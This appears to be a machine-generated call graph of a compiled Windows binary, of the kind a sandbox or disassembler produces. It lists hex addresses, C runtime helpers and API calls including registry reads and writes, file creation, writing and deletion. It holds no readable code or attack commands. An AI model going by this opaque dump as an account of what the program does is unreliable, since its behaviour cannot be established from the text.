19134->19135 19136 105e3b1 19135->19136 19137 10611d3 40 API calls 19136->19137 19139 105e3c1 19136->19139 19137->19139 19138 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19140 105e45d 19138->19140 19139->19138 19140->19132 19142 105dbf2 _unexpected 37 API calls 19141->19142 19143 105e37b 19142->19143 19144 105e2ee __fassign 37 API calls 19143->19144 19145 105e38b 19144->19145 19145->19132 19147 10568d4 19146->19147 19148 10568e5 __InternalCxxFrameHandler __wsopen_s 19147->19148 19151 1056980 19147->19151 19148->19103 19150 105696b 19150->19103 19152 1056ab9 19151->19152 19153 10569ab 19151->19153 19154 1042150 Concurrency::cancel_current_task 27 API calls 19152->19154 19155 10569f2 19153->19155 19157 1056a19 19153->19157 19161 1056a03 __wsopen_s 19154->19161 19155->19152 19156 10569fd 19155->19156 19159 10570b4 27 API calls 19156->19159 19160 10570b4 27 API calls 19157->19160 19157->19161 19158 105b98e 25 API calls 19162 1056ac8 19158->19162 19159->19161 19160->19161 19161->19158 19166 1056a81 __wsopen_s 19161->19166 19163 1056afa 19162->19163 19164 105b98e 25 API calls 19162->19164 19163->19150 19165 1056b1e 19164->19165 19166->19150 19168 10565ae 19167->19168 19169 105648b 19167->19169 19170 1042150 Concurrency::cancel_current_task 27 API calls 19168->19170 19171 10564d2 19169->19171 19172 10564fc 19169->19172 19174 10564e3 __wsopen_s 19170->19174 19171->19168 19173 10564dd 19171->19173 19172->19174 19177 10570b4 27 API calls 19172->19177 19176 10570b4 27 API calls 19173->19176 19175 105b98e 25 API calls 19174->19175 19179 105656c __wsopen_s 19174->19179 19178 10565bd 19175->19178 19176->19174 19177->19174 19179->18987 19181 105673b 19180->19181 19189 1056824 __wsopen_s 19180->19189 19182 10568b1 19181->19182 19184 10567d1 19181->19184 19185 10567aa 19181->19185 19181->19189 19191 10567bb __wsopen_s 19181->19191 19183 1042150 Concurrency::cancel_current_task 27 API calls 19182->19183 19186 10568bb 19183->19186 19187 10570b4 27 API calls 19184->19187 19184->19191 19185->19182 19188 10570b4 27 API calls 19185->19188 19187->19191 19188->19191 19189->18993 19190 105b98e 25 API calls 19190->19182 19191->19189 19191->19190 19194 105a771 CallCatchBlock 19192->19194 19193 105a778 19195 105b4a2 __dosmaperr 14 API calls 19193->19195 19194->19193 19197 105a798 19194->19197 19196 105a77d 19195->19196 19198 105b97e ___std_exception_copy 25 API calls 19196->19198 19199 105a79d 19197->19199 19200 105a7aa 19197->19200 19201 1049f6f 19198->19201 19202 105b4a2 __dosmaperr 14 API calls 19199->19202 19209 105cdcf 19200->19209 19201->18839 19201->19002 19202->19201 19205 105a7c7 19217 105a805 19205->19217 19206 105a7ba 19207 105b4a2 __dosmaperr 14 API calls 19206->19207 19207->19201 19210 105cddb CallCatchBlock 19209->19210 19221 105cc03 EnterCriticalSection 19210->19221 19212 105cde9 19222 105ce73 19212->19222 19218 105a809 19217->19218 19242 105cdbb LeaveCriticalSection 19218->19242 19220 105a81a 19220->19201 19221->19212 19229 105ce96 19222->19229 19223 105ceee 19224 105f5d6 _unexpected 14 API calls 19223->19224 19225 105cef7 19224->19225 19227 105d301 _free 14 API calls 19225->19227 19228 105cf00 19227->19228 19230 105e1b4 __wsopen_s 6 API calls 19228->19230 19234 105cdf6 19228->19234 19229->19223 19229->19229 19229->19234 19238 105cda7 EnterCriticalSection 19229->19238 19239 105cdbb LeaveCriticalSection 19229->19239 19231 105cf1f 19230->19231 19240 105cda7 EnterCriticalSection 19231->19240 19235 105ce2f 19234->19235 19241 105cc4b LeaveCriticalSection 19235->19241 19237 105a7b3 19237->19205 19237->19206 19238->19229 19239->19229 19240->19234 19241->19237 19242->19220 19243->19010 19245 105a855 19244->19245 19246 105a840 19244->19246 19252 105a850 19245->19252 19263 105d734 19245->19263 19247 105b4a2 __dosmaperr 14 API calls 19246->19247 19248 105a845 19247->19248 19250 105b97e ___std_exception_copy 25 API calls 19248->19250 19250->19252 19252->19013 19256 105a878 19280 105d3c7 19256->19280 19259 105d301 _free 14 API calls 19259->19252 19512 105cdbb LeaveCriticalSection 19260->19512 19262 105a92c 19262->19011 19264 105a86a 19263->19264 19265 105d74c 19263->19265 19269 105d517 19264->19269 19265->19264 19266 105d4f0 ___scrt_uninitialize_crt 25 API calls 19265->19266 19267 105d76a 19266->19267 19295 1062f23 19267->19295 19270 105d52e 19269->19270 19272 105a872 19269->19272 19271 105d301 _free 14 API calls 19270->19271 19270->19272 19271->19272 19273 105d4f0 19272->19273 19274 105d511 19273->19274 19275 105d4fc 19273->19275 19274->19256 19276 105b4a2 __dosmaperr 14 API calls 19275->19276 19277 105d501 19276->19277 19278 105b97e ___std_exception_copy 25 API calls 19277->19278 19279 105d50c 19278->19279 19279->19256 19281 105d3d8 19280->19281 19283 105d3ed 19280->19283 19284 105b48f __dosmaperr 14 API calls 19281->19284 19282 105d436 19285 105b48f __dosmaperr 14 API calls 19282->19285 19283->19282 19287 105d414 19283->19287 19286 105d3dd 19284->19286 19288 105d43b 19285->19288 19289 105b4a2 __dosmaperr 14 API calls 19286->19289 19472 105d33b 19287->19472 19291 105b4a2 __dosmaperr 14 API calls 19288->19291 19292 105a87e 19289->19292 19293 105d443 19291->19293 19292->19252 19292->19259 19294 105b97e ___std_exception_copy 25 API calls 19293->19294 19294->19292 19296 1062f2f CallCatchBlock 19295->19296 19297 1062f37 19296->19297 19300 1062f4f 19296->19300 19320 105b48f 19297->19320 19298 1062fea 19301 105b48f __dosmaperr 14 API calls 19298->19301 19300->19298 19304 1062f81 19300->19304 19305 1062fef 19301->19305 19303 105b4a2 __dosmaperr 14 API calls 19319 1062f44 19303->19319 19323 105eb55 EnterCriticalSection 19304->19323 19307 105b4a2 __dosmaperr 14 API calls 19305->19307 19309 1062ff7 19307->19309 19308 1062f87 19310 1062fa3 19308->19310 19311 1062fb8 19308->19311 19312 105b97e ___std_exception_copy 25 API calls 19309->19312 19313 105b4a2 __dosmaperr 14 API calls 19310->19313 19324 1063015 19311->19324 19312->19319 19315 1062fa8 19313->19315 19317 105b48f __dosmaperr 14 API calls 19315->19317 19316 1062fb3 19366 1062fe2 19316->19366 19317->19316 19319->19264 19321 105dd49 __dosmaperr 14 API calls 19320->19321 19322 105b494 19321->19322 19322->19303 19323->19308 19325 1063037 19324->19325 19362 1063053 19324->19362 19326 106303b 19325->19326 19329 106308b 19325->19329 19327 105b48f __dosmaperr 14 API calls 19326->19327 19328 1063040 19327->19328 19330 105b4a2 __dosmaperr 14 API calls 19328->19330 19331 106309e 19329->19331 19369 106571e 19329->19369 19333 1063048 19330->19333 19372 1062bbc 19331->19372 19336 105b97e ___std_exception_copy 25 API calls 19333->19336 19336->19362 19337 10630b4 19339 10630dd 19337->19339 19340 10630b8 19337->19340 19338 10630f3 19341 1063107 19338->19341 19342 106314c WriteFile 19338->19342 19384 10627aa GetConsoleCP 19339->19384 19349 10630d3 19340->19349 19379 1062b54 19340->19379 19345 1063112 19341->19345 19346 106313c 19341->19346 19344 1063170 GetLastError 19342->19344 19342->19349 19344->19349 19350 1063117 19345->19350 19351 106312c 19345->19351 19412 1062c2d 19346->19412 19354 1063196 19349->19354 19355 10631c0 19349->19355 19349->19362 19350->19349 19397 1062d08 19350->19397 19404 1062df1 19351->19404 19356 10631b4 19354->19356 19357 106319d 19354->19357 19360 105b4a2 __dosmaperr 14 API calls 19355->19360 19355->19362 19419 105b46c 19356->19419 19358 105b4a2 __dosmaperr 14 API calls 19357->19358 19361 10631a2 19358->19361 19363 10631d8 19360->19363 19364 105b48f __dosmaperr 14 API calls 19361->19364 19362->19316 19365 105b48f __dosmaperr 14 API calls 19363->19365 19364->19362 19365->19362 19471 105ec0a LeaveCriticalSection 19366->19471 19368 1062fe8 19368->19319 19424 10656a2 19369->19424 19446 1063fad 19372->19446 19374 1062bcd 19375 105dbf2 _unexpected 37 API calls 19374->19375 19378 1062c23 19374->19378 19376 1062bf0 19375->19376 19377 1062c0a GetConsoleMode 19376->19377 19376->19378 19377->19378 19378->19337 19378->19338 19380 1062bab 19379->19380 19383 1062b76 19379->19383 19380->19349 19381 1065739 5 API calls __wsopen_s 19381->19383 19382 1062bad GetLastError 19382->19380 19383->19380 19383->19381 19383->19382 19385 105a9fd __fassign 37 API calls 19384->19385 19391 1062806 __wsopen_s 19385->19391 19386 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19388 1062b52 19386->19388 19387 105e370 __wsopen_s 37 API calls 19387->19391 19388->19349 19389 105f40c 38 API calls __fassign 19389->19391 19390 1062aa6 19390->19386 19391->19387 19391->19389 19391->19390 19393 1060623 __wsopen_s WideCharToMultiByte 19391->19393 19394 1062a29 WriteFile 19391->19394 19396 1062a61 WriteFile 19391->19396 19455 1063e93 19391->19455 19393->19391 19394->19391 19395 1062b22 GetLastError 19394->19395 19395->19390 19396->19391 19396->19395 19402 1062d17 __wsopen_s 19397->19402 19398 1062dd6 19399 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19398->19399 19401 1062def 19399->19401 19400 1062d8c WriteFile 19400->19402 19403 1062dd8 GetLastError 19400->19403 19401->19349 19402->19398 19402->19400 19403->19398 19411 1062e00 __wsopen_s 19404->19411 19405 1062f08 19406 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19405->19406 19407 1062f21 19406->19407 19407->19349 19408 1060623 __wsopen_s WideCharToMultiByte 19408->19411 19409 1062f0a GetLastError 19409->19405 19410 1062ebf WriteFile 19410->19409 19410->19411 19411->19405 19411->19408 19411->19409 19411->19410 19417 1062c3c __wsopen_s 19412->19417 19413 1062ced 19414 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19413->19414 19415 1062d06 19414->19415 19415->19349 19416 1062cac WriteFile 19416->19417 19418 1062cef GetLastError 19416->19418 19417->19413 19417->19416 19418->19413 19420 105b48f __dosmaperr 14 API calls 19419->19420 19421 105b477 __dosmaperr 19420->19421 19422 105b4a2 __dosmaperr 14 API calls 19421->19422 19423 105b48a 19422->19423 19423->19362 19433 105edd1 19424->19433 19426 10656b4 19427 10656bc 19426->19427 19428 10656cd SetFilePointerEx 19426->19428 19429 105b4a2 __dosmaperr 14 API calls 19427->19429 19430 10656c1 19428->19430 19431 10656e5 GetLastError 19428->19431 19429->19430 19430->19331 19432 105b46c __dosmaperr 14 API calls 19431->19432 19432->19430 19434 105edf3 19433->19434 19435 105edde 19433->19435 19438 105b48f __dosmaperr 14 API calls 19434->19438 19440 105ee18 19434->19440 19436 105b48f __dosmaperr 14 API calls 19435->19436 19437 105ede3 19436->19437 19439 105b4a2 __dosmaperr 14 API calls 19437->19439 19441 105ee23 19438->19441 19443 105edeb 19439->19443 19440->19426 19442 105b4a2 __dosmaperr 14 API calls 19441->19442 19444 105ee2b 19442->19444 19443->19426 19445 105b97e ___std_exception_copy 25 API calls 19444->19445 19445->19443 19447 1063fc7 19446->19447 19448 1063fba 19446->19448 19450 1063fd3 19447->19450 19451 105b4a2 __dosmaperr 14 API calls 19447->19451 19449 105b4a2 __dosmaperr 14 API calls 19448->19449 19452 1063fbf 19449->19452 19450->19374 19453 1063ff4 19451->19453 19452->19374 19454 105b97e ___std_exception_copy 25 API calls 19453->19454 19454->19452 19456 1063eac __wsopen_s 19455->19456 19457 1063f48 __wsopen_s 19455->19457 19460 1063f33 19456->19460 19464 1063f1e 19456->19464 19465 1065926 19456->19465 19459 1065926 __fassign 19 API calls 19457->19459 19461 1063f78 19457->19461 19457->19464 19459->19457 19463 105b4a2 __dosmaperr 14 API calls 19460->19463 19462 105b4a2 __dosmaperr 14 API calls 19461->19462 19462->19464 19463->19464 19464->19391 19470 106594d 19465->19470 19466 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19469 1065acb 19466->19469 19467 1065972 19467->19466 19468 1063f8e __fassign 14 API calls 19468->19467 19469->19456 19470->19467 19470->19468 19471->19368 19473 105d347 CallCatchBlock 19472->19473 19483 105eb55 EnterCriticalSection 19473->19483 19475 105d355 19476 105d387 19475->19476 19477 105d37c 19475->19477 19479 105b4a2 __dosmaperr 14 API calls 19476->19479 19484 105d454 19477->19484 19480 105d382 19479->19480 19499 105d3bb 19480->19499 19483->19475 19485 105edd1 __wsopen_s 25 API calls 19484->19485 19488 105d464 19485->19488 19486 105d46a 19502 105ed40 19486->19502 19488->19486 19490 105edd1 __wsopen_s 25 API calls 19488->19490 19498 105d49c 19488->19498 19492 105d493 19490->19492 19491 105edd1 __wsopen_s 25 API calls 19493 105d4a8 FindCloseChangeNotification 19491->19493 19497 105edd1 __wsopen_s 25 API calls 19492->19497 19493->19486 19494 105d4b4 GetLastError 19493->19494 19494->19486 19495 105b46c __dosmaperr 14 API calls 19496 105d4e4 19495->19496 19496->19480 19497->19498 19498->19486 19498->19491 19511 105ec0a LeaveCriticalSection 19499->19511 19501 105d3a4 19501->19292 19503 105edb6 19502->19503 19504 105ed4f 19502->19504 19505 105b4a2 __dosmaperr 14 API calls 19503->19505 19504->19503 19509 105ed79 __wsopen_s 19504->19509 19506 105edbb 19505->19506 19507 105b48f __dosmaperr 14 API calls 19506->19507 19508 105d4c2 19507->19508 19508->19495 19508->19496 19509->19508 19510 105eda0 SetStdHandle 19509->19510 19510->19508 19511->19501 19512->19262 19514 105a9fd __fassign 37 API calls 19513->19514 19515 105aa92 19514->19515 19516 105aaa4 19515->19516 19526 105e039 19515->19526 19518 105a9e0 19516->19518 19532 105a92e 19518->19532 19521 105e348 DeleteFileW 19522 105e36c 19521->19522 19523 105e35a GetLastError 19521->19523 19522->19024 19524 105b46c __dosmaperr 14 API calls 19523->19524 19525 105e366 19524->19525 19525->19024 19529 105de44 19526->19529 19530 105df73 _unexpected 5 API calls 19529->19530 19531 105de5a 19530->19531 19531->19516 19533 105a956 19532->19533 19534 105a93c 19532->19534 19536 105a95d 19533->19536 19537 105a97c 19533->19537 19550 105aabf 19534->19550 19542 105a946 19536->19542 19554 105aad9 19536->19554 19538 105d838 __fassign MultiByteToWideChar 19537->19538 19539 105a98b 19538->19539 19541 105a992 GetLastError 19539->19541 19544 105a9b8 19539->19544 19546 105aad9 __wsopen_s 15 API calls 19539->19546 19543 105b46c __dosmaperr 14 API calls 19541->19543 19542->19024 19542->19521 19545 105a99e 19543->19545 19544->19542 19547 105d838 __fassign MultiByteToWideChar 19544->19547 19548 105b4a2 __dosmaperr 14 API calls 19545->19548 19546->19544 19549 105a9cf 19547->19549 19548->19542 19549->19541 19549->19542 19551 105aad2 19550->19551 19552 105aaca 19550->19552 19551->19542 19553 105d301 _free 14 API calls 19552->19553 19553->19551 19555 105aabf __wsopen_s 14 API calls 19554->19555 19556 105aae7 19555->19556 19559 105ab18 19556->19559 19560 105d7ea __wsopen_s 15 API calls 19559->19560 19561 105aaf8 19560->19561 19561->19542 19614 1058380 19562->19614 19565 1042d96 RegQueryValueExA 19566 1042dc0 RegCloseKey 19565->19566 19567 1042de6 19566->19567 19567->19567 19568 1055ac0 27 API calls 19567->19568 19570 1042dfe 19568->19570 19569 1042e8d 19574 105b98e 25 API calls 19569->19574 19570->19569 19571 1042e66 19570->19571 19572 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19571->19572 19573 1042e89 19572->19573 19573->18857 19575 1042e92 19574->19575 19577 10556d1 19576->19577 19578 10556ae 19576->19578 19577->18885 19578->19577 19579 105b98e 25 API calls 19578->19579 19580 105571c 19579->19580 19582 1042f07 RegCloseKey 19581->19582 19583 1042edd RegSetValueExA 19581->19583 19586 1042f18 19582->19586 19583->19582 19584 1042fd6 19588 105b98e 25 API calls 19584->19588 19585 1042fbe 19587 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19585->19587 19586->19584 19586->19585 19590 1042fd2 19587->19590 19589 1042fdb 19588->19589 19590->18868 19590->18912 19616 1056ca2 19591->19616 19595 1045dc0 19594->19595 19595->19595 19596 1055ac0 27 API calls 19595->19596 19597 1045ddc 19596->19597 19598 1055760 27 API calls 19597->19598 19602 1045df5 19598->19602 19599 1045f5f 19601 1055ac0 27 API calls 19599->19601 19600 1055760 27 API calls 19600->19602 19606 1045fd6 19601->19606 19602->19599 19602->19600 19603 1042be0 42 API calls 19602->19603 19605 1046081 19602->19605 19610 1046086 19602->19610 19611 1055ac0 27 API calls 19602->19611 19603->19602 19604 1046053 19607 1056cc2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 19604->19607 19609 105b98e 25 API calls 19605->19609 19606->19604 19606->19605 19608 104607a 19607->19608 19608->18880 19609->19610 19612 1055c00 27 API calls 19610->19612 19611->19602 19613 104608b 19612->19613 19615 1042d67 RegOpenKeyExA 19614->19615 19615->19565 19615->19566 19621 1056c16 19616->19621 19619 1058133 std::_Xinvalid_argument RaiseException 19620 1056cc1 19619->19620 19624 1056b37 19621->19624 19625 1057ef8 ___std_exception_copy 26 API calls 19624->19625 19626 1056b63 19625->19626 19626->19619 19629 1045238 19627->19629 19637 104534a 19627->19637 19628 1055760 27 API calls 19628->19629 19629->19628 19630 1042be0 42 API calls 19629->19630 19631 1045380 19629->19631 19632 1055ac0 27 API calls 19629->19632 19634 1045385 19629->19634 19629->19637 19630->19629 19633 1055c00 27 API calls 19631->19633 19632->19629 19633->19634 19635 105b98e 25 API calls 19634->19635 19636 104538a 19635->19636 19637->18926 19784 1056cd3 19795 1056cfa InitializeCriticalSectionAndSpinCount GetModuleHandleW 19784->19795 19786 1056cd8 19806 1057193 19786->19806 19788 1056cdf 19789 1056ce4 19788->19789 19790 1056cf2 19788->19790 19812 1057320 19789->19812 19791 10575c0 ___scrt_fastfail 4 API calls 19790->19791 19794 1056cf9 19791->19794 19796 1056d1d GetModuleHandleW 19795->19796 19797 1056d2e GetProcAddress GetProcAddress 19795->19797 19796->19797 19798 1056d74 19796->19798 19799 1056d4c 19797->19799 19800 1056d5e CreateEventW 19797->19800 19802 10575c0 ___scrt_fastfail 4 API calls 19798->19802 19799->19800 19801 1056d50 19799->19801 19800->19798 19800->19801 19801->19786 19803 1056d7b DeleteCriticalSection 19802->19803 19804 1056d97 19803->19804 19805 1056d90 CloseHandle 19803->19805 19804->19786 19805->19804 19807 10571a3 19806->19807 19808 105719f 19806->19808 19809 10575c0 ___scrt_fastfail 4 API calls 19807->19809 19811 10571b0 ___scrt_release_startup_lock 19807->19811 19808->19788 19810 1057219 19809->19810 19811->19788 19815 10572f3 19812->19815 19816 1057302 19815->19816 19817 1057309 19815->19817 19821 105c44f 19816->19821 19824 105c4bb 19817->19824 19820 1056cee 19822 105c4bb 28 API calls 19821->19822 19823 105c461 19822->19823 19823->19820 19827 105c1f1 19824->19827 19828 105c1fd CallCatchBlock 19827->19828 19835 105cc03 EnterCriticalSection 19828->19835 19830 105c20b 19836 105c24c 19830->19836 19832 105c218 19846 105c240 19832->19846 19835->19830 19837 105c268 19836->19837 19839 105c2df _unexpected 19836->19839 19838 105c2bf 19837->19838 19837->19839 19849 1060af3 19837->19849 19838->19839 19841 1060af3 28 API calls 19838->19841 19839->19832 19843 105c2d5 19841->19843 19842 105c2b5 19844 105d301 _free 14 API calls 19842->19844 19845 105d301 _free 14 API calls 19843->19845 19844->19838 19845->19839 19877 105cc4b LeaveCriticalSection 19846->19877 19848 105c229 19848->19820 19850 1060b00 19849->19850 19851 1060b1b 19849->19851 19850->19851 19853 1060b0c 19850->19853 19852 1060b2a 19851->19852 19858 1064a0c 19851->19858 19865 1064a3f 19852->19865 19854 105b4a2 __dosmaperr 14 API calls 19853->19854 19857 1060b11 ___scrt_fastfail 19854->19857 19857->19842 19859 1064a17 19858->19859 19860 1064a2c HeapSize 19858->19860 19861 105b4a2 __dosmaperr 14 API calls 19859->19861 19860->19852 19862 1064a1c 19861->19862 19863 105b97e ___std_exception_copy 25 API calls 19862->19863 19864 1064a27 19863->19864 19864->19852 19866 1064a57 19865->19866 19867 1064a4c 19865->19867 19869 1064a5f 19866->19869 19875 1064a68 _unexpected 19866->19875 19868 105d7ea __wsopen_s 15 API calls 19867->19868 19874 1064a54 19868->19874 19872 105d301 _free 14 API calls 19869->19872 19870 1064a92 HeapReAlloc 19870->19874 19870->19875 19871 1064a6d 19873 105b4a2 __dosmaperr 14 API calls 19871->19873 19872->19874 19873->19874 19874->19857 19875->19870 19875->19871 19876 105b9f9 _unexpected 2 API calls 19875->19876 19876->19875 19877->19848 19878 1057422 19883 1057725 SetUnhandledExceptionFilter 19878->19883 19880 1057427 19884 105c988 19880->19884 19882 1057432 19883->19880 19885 105c994 19884->19885 19886 105c9ae 19884->19886 19885->19886 19887 105b4a2 __dosmaperr 14 API calls 19885->19887 19886->19882 19888 105c99e 19887->19888 19889 105b97e ___std_exception_copy 25 API calls 19888->19889 19890 105c9a9 19889->19890 19890->19882 19891 105d15f 19896 105cf35 19891->19896 19894 105d19e 19897 105cf54 19896->19897 19898 105cf67 19897->19898 19902 105cf7c 19897->19902 19899 105b4a2 __dosmaperr 14 API calls 19898->19899 19900 105cf6c 19899->19900 19901 105b97e ___std_exception_copy 25 API calls 19900->19901 19903 105cf77 19901->19903 19911 105d09c 19902->19911 19916 1061bd0 19902->19916 19903->19894 19913 1062341 19903->19913 19904 105b4a2 __dosmaperr 14 API calls 19905 105d14d 19904->19905 19906 105b97e ___std_exception_copy 25 API calls 19905->19906 19906->19903 19908 105d0ec 19909 1061bd0 37 API calls 19908->19909 19908->19911 19910 105d10a 19909->19910 19910->19911 19912 1061bd0 37 API calls 19910->19912 19911->19903 19911->19904 19912->19911 19948 1061d06 19913->19948 19917 1061c27 19916->19917 19918 1061bdf 19916->19918 19930 1061c3d 19917->19930 19919 1061be5 19918->19919 19923 1061c02 19918->19923 19922 105b4a2 __dosmaperr 14 API calls 19919->19922 19921 1061bf5 19921->19908 19924 1061bea 19922->19924 19926 105b4a2 __dosmaperr 14 API calls 19923->19926 19929 1061c20 19923->19929 19925 105b97e ___std_exception_copy 25 API calls 19924->19925 19925->19921 19927 1061c11 19926->19927 19928 105b97e ___std_exception_copy 25 API calls 19927->19928 19928->19921 19929->19908 19931 1061c67 19930->19931 19932 1061c4d 19930->19932 19934 1061c86 19931->19934 19935 1061c6f 19931->19935 19933 105b4a2 __dosmaperr 14 API calls 19932->19933 19938 1061c52 19933->19938 19936 1061c92 19934->19936 19937 1061ca9 19934->19937 19939 105b4a2 __dosmaperr 14 API calls 19935->19939 19940 105b4a2 __dosmaperr 14 API calls 19936->19940 19945 105a9fd __fassign 37 API calls 19937->19945 19946 1061c5d 19937->19946 19941 105b97e ___std_exception_copy 25 API calls 19938->19941 19942 1061c74 19939->19942 19944 1061c97 19940->19944 19941->19946 19943 105b97e ___std_exception_copy 25 API calls 19942->19943 19943->19946 19947 105b97e ___std_exception_copy 25 API calls 19944->19947 19945->19946 19946->19921 19947->19946 19949 1061d12 CallCatchBlock 19948->19949 19950 1061d19 19949->19950 19952 1061d44 19949->19952 19951 105b4a2 __dosmaperr 14 API calls 19950->19951 19953 1061d1e 19951->19953 19959 10622d3 19952->19959 19954 105b97e ___std_exception_copy 25 API calls 19953->19954 19958 1061d28 19954->19958 19958->19894 19960 105aa80 __wsopen_s 37 API calls 19959->19960 19961 10622f5 19960->19961 19962 105a9e0 __wsopen_s 17 API calls 19961->19962 19963 1062302 19962->19963 19964 1062309 19963->19964 19972 1062361 19963->19972 19966 105d301 _free 14 API calls 19964->19966 19967 1061d68 19964->19967 19966->19967 19968 1061d9b 19967->19968 19969 1061dc5 19968->19969 19970 1061da1 19968->19970 19969->19958 20249 105ec0a LeaveCriticalSection 19970->20249 20019 10620af 19972->20019 19975 1062393 19978 105b48f __dosmaperr 14 API calls 19975->19978 19976 10623ac 20037 105ec2d 19976->20037 19992 1062398 19978->19992 19980 10623d1 20050 106201a CreateFileW 19980->20050 19981 10623ba 19983 105b48f __dosmaperr 14 API calls 19981->19983 19982 105b4a2 __dosmaperr 14 API calls 20009 10623a5 19982->20009 19985 10623bf 19983->19985 19987 105b4a2 __dosmaperr 14 API calls 19985->19987 19986 106240a 19988 1062487 GetFileType 19986->19988 19989 106245c GetLastError 19986->19989 20051 106201a CreateFileW 19986->20051 19987->19992 19990 1062492 GetLastError 19988->19990 19991 10624d9 19988->19991 19993 105b46c __dosmaperr 14 API calls 19989->19993 19994 105b46c __dosmaperr 14 API calls 19990->19994 20052 105eb78 19991->20052 19992->19982 19993->19992 19996 10624a0 CloseHandle 19994->19996 19996->19992 19999 10624c9 19996->19999 19998 106244f 19998->19988 19998->19989 20001 105b4a2 __dosmaperr 14 API calls 19999->20001 20003 10624ce 20001->20003 20002 1062546 20007 106254d 20002->20007 20076 1061dc7 20002->20076 20003->19992 20010 105d454 __wsopen_s 28 API calls 20007->20010 20008 1062589 20008->20009 20011 1062605 CloseHandle 20008->20011 20009->19964 20010->20009 20102 106201a CreateFileW 20011->20102 20013 1062630 20014 1062666 20013->20014 20015 106263a GetLastError 20013->20015 20014->20009 20016 105b46c __dosmaperr 14 API calls 20015->20016 20017 1062646 20016->20017 20018 105ed40 __wsopen_s 15 API calls 20017->20018 20018->20014 20020 10620d0 20019->20020 20025 10620ea 20019->20025 20022 105b4a2 __dosmaperr 14 API calls 20020->20022 20020->20025 20023 10620df 20022->20023 20024 105b97e ___std_exception_copy 25 API calls 20023->20024 20024->20025 20103 106203f 20025->20103 20026 1062151 20036 10621a4 20026->20036 20110 105c721 20026->20110 20027 1062122 20027->20026 20029 105b4a2 __dosmaperr 14 API calls 20027->20029 20031 1062146 20029->20031 20030 106219f 20032 106221c 20030->20032 20030->20036 20033 105b97e ___std_exception_copy 25 API calls 20031->20033 20034 105b9ab ___std_exception_copy 11 API calls 20032->20034 20033->20026 20035 1062228 20034->20035 20036->19975 20036->19976 20038 105ec39 CallCatchBlock 20037->20038 20117 105cc03 EnterCriticalSection 20038->20117 20040 105ec87 20118 105ed37 20040->20118 20041 105ec65 20044 105ea07 __wsopen_s 15 API calls 20041->20044 20042 105ec40 20042->20040 20042->20041 20047 105ecd4 EnterCriticalSection 20042->20047 20046 105ec6a 20044->20046 20046->20040 20121 105eb55 EnterCriticalSection 20046->20121 20047->20040 20049 105ece1 LeaveCriticalSection 20047->20049 20049->20042 20050->19986 20051->19998 20053 105eb87 20052->20053 20054 105ebf0 20052->20054 20053->20054 20059 105ebad __wsopen_s 20053->20059 20055 105b4a2 __dosmaperr 14 API calls 20054->20055 20056 105ebf5 20055->20056 20057 105b48f __dosmaperr 14 API calls 20056->20057 20058 105ebdd 20057->20058 20058->20002 20061 1062229 20058->20061 20059->20058 20060 105ebd7 SetStdHandle 20059->20060 20060->20058 20062 1062251 20061->20062 20063 1062283 20061->20063 20062->20063 20064 106571e __wsopen_s 27 API calls 20062->20064 20063->20002 20065 1062261 20064->20065 20066 1062287 20065->20066 20067 1062271 20065->20067 20123 10652f2 20066->20123 20069 105b48f __dosmaperr 14 API calls 20067->20069 20070 1062276 20069->20070 20070->20063 20072 105b4a2 __dosmaperr 14 API calls 20070->20072 20072->20063 20073 106571e __wsopen_s 27 API calls 20073->20070 20075 10622af 20075->20070 20075->20073 20077 1061df7 20076->20077 20096 1061f53 20076->20096 20078 105c721 __wsopen_s 25 API calls 20077->20078 20083 1061e17 20077->20083 20079 1061e0e 20078->20079 20080 106200f 20079->20080 20079->20083 20081 105b9ab ___std_exception_copy 11 API calls 20080->20081 20082 1062019 20081->20082 20085 1061ecb 20083->20085 20086 106571e __wsopen_s 27 API calls 20083->20086 20083->20096 20084 10652f2 __wsopen_s 37 API calls 20087 1061ef0 20084->20087 20085->20084 20088 1061f4e 20085->20088 20091 1061f1e 20085->20091 20085->20096 20089 1061f32 20086->20089 20087->20088 20087->20091 20092 1061f6f 20087->20092 20093 1061f7c 20087->20093 20094 1061f9e 20087->20094 20090 105b4a2 __dosmaperr 14 API calls 20088->20090 20089->20091 20095 106571e __wsopen_s 27 API calls 20089->20095 20090->20096 20091->20088 20091->20096 20100 1062f23 __wsopen_s 62 API calls 20091->20100 20097 105b4a2 __dosmaperr 14 API calls 20092->20097 20093->20094 20098 1061f83 20093->20098 20099 106571e __wsopen_s 27 API calls 20094->20099 20095->20085 20096->20007 20096->20008 20097->20088 20101 106571e __wsopen_s 27 API calls 20098->20101 20099->20091 20100->20091 20101->20091 20102->20013 20106 1062057 20103->20106 20104 1062072 20104->20027 20105 105b4a2 __dosmaperr 14 API calls 20107 1062096 20105->20107 20106->20104 20106->20105 20108 105b97e ___std_exception_copy 25 API calls 20107->20108 20109 10620a1 20108->20109 20109->20027 20111 105c742 20110->20111 20112 105c72d 20110->20112 20111->20030 20113 105b4a2 __dosmaperr 14 API calls 20112->20113 20114 105c732 20113->20114 20115 105b97e ___std_exception_copy 25 API calls 20114->20115 20116 105c73d 20115->20116 20116->20030 20117->20042 20122 105cc4b LeaveCriticalSection 20118->20122 20120 105eca7 20120->19980 20120->19981 20121->20040 20122->20120 20124 1065304 20123->20124 20125 106531c 20123->20125 20126 105b48f __dosmaperr 14 API calls 20124->20126 20127 1065683 20125->20127 20132 106535c 20125->20132 20128 1065309 20126->20128 20129 105b48f __dosmaperr 14 API calls 20127->20129 20130 105b4a2 __dosmaperr 14 API calls 